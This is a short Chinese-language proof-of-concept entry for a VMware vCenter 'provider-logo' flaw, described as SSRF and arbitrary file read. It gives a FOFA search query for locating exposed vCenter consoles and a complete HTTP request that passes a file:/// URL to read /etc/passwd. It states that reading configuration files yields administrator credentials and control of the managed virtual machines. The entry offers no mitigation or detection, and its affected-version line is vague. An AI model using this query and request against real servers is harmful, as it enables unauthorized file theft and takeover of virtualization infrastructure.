VMware vCenter provider-logo存在SSRF漏洞
一、漏洞简介
VMware vCenter Server是美国威睿(Vmware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。VMware vCenter存在任意文件读取漏洞,远程攻击者通过访问开放在外部的vCenter 控制台,可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理员账号密码)进而控制 vCenter 平台及其管理的虚拟机集群。
二、影响版本
- VMware vCenter
三、资产测绘
- fofa
title="ID_VC_Welcome"
四、漏洞复现
GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/2.0
Host:
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
accept-language: zh-CN,zh;q=0.9
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-fetch-user: ?1
sec-fetch-dest: document
sec-fetch-mode: navigate
accept-encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
upgrade-insecure-requests: 1